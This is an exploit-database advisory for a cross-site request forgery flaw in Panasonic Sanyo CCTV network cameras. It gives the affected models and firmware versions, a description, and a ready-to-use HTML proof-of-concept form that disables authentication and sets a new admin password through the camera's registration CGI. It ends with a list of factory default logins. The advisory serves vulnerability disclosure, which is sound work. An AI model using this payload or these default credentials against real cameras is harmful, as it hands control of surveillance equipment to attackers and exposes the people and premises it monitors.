Panasonic Sanyo CCTV Network Camera 2.03-0x Cross Site Request Forgery Vulnerability

2021-07-30T00:00:00
ID 1337DAY-ID-36612
Type zdt
Reporter LiquidWorm
Modified 2021-07-30T00:00:00

Description

Panasonic Sanyo CCTV Network Camera version 2.03-0x allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. These actions can be exploited to perform authentication detriment and account password change with administrative privileges if a logged-in user visits a malicious web site.

                                        
                                            <!--

Panasonic Sanyo CCTV Network Camera 2.03-0x CSRF Disable Authentication / Change Password


Vendor: Panasonic Corporation | SANYO Electric Co., Ltd.
Product web page: https://www.panasonic.com
                  https://www.sanyo-av.com
                  https://panasonic.net/sanyo/cs/index.html

Affected version: Model: VCC-HD5600P, FrmVer: 2.03-06 (110315-00),  SubVer: 1.01-00 (100528-00)
                  Model: VDC-HD3300P, FrmVer: 2.03-08 (111222-00),  SubVer: 1.01-00 (100528-00)
                  Model: VDC-HD3300P, FrmVer: 1.02-05 (101005-07),  SubVer: 1.01-00 (100528-00)
                  Model: VCC-HD3300,  FrmVer: 2.03-02 (110318-00A), SubVer: 1.01-00 (100528-00)
                  Model: VDC-HD3100P, FrmVer: 2.03-00 (110204-02),  SubVer: 1.01-00 (100528-00)
                  Model: VCC-HD2100P, FrmVer: 2.03-02 (110318-00A), SubVer: 1.01-00 (100528-00)

Summary: SANYO network camera and network optional board with the
latest H.264 compression technology provide the optimum surveillance
applications with high quality real time moving image at low bandwidth.
Simultaneous stream of H.264 and JPEG data and also COAX video out
to provide flexible solution for digital and analogue combined system.

Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. These actions can be exploited to perform authentication
detriment and account password change with administrative privileges if
a logged-in user visits a malicious web site.

Tested on: Embedded Linux
           CGI


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5659
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5659.php


13.07.2021

-->


           [CSRF]
[Anonymous user log in = ON]
orororororororororororororor
  [Change admin password]

<html>
  <body>
    <form action="http://10.0.0.3:82/cgi-bin/user_registration.cgi" method="POST">
      <input type="hidden" name="anonymous_sw" value="1" /> <!--Disable authentication-->
      <input type="hidden" name="admin1_pw" value="Ztream0017" /> <!--Change admin password-->
      <input type="hidden" name="admin2_pw" value="******" />
      <input type="hidden" name="admin3_pw" value="******" />
      <input type="hidden" name="operator_pw" value="********" />
      <input type="hidden" name="guest_pw" value="*****" />
      <input type="submit" value="Push" />
    </form>
  </body>
</html>

<!--
[Defaults]
admin:admin
admin2:admin2
admin3:admin3
operator:operator
operator2:operator2
guest:guest
-->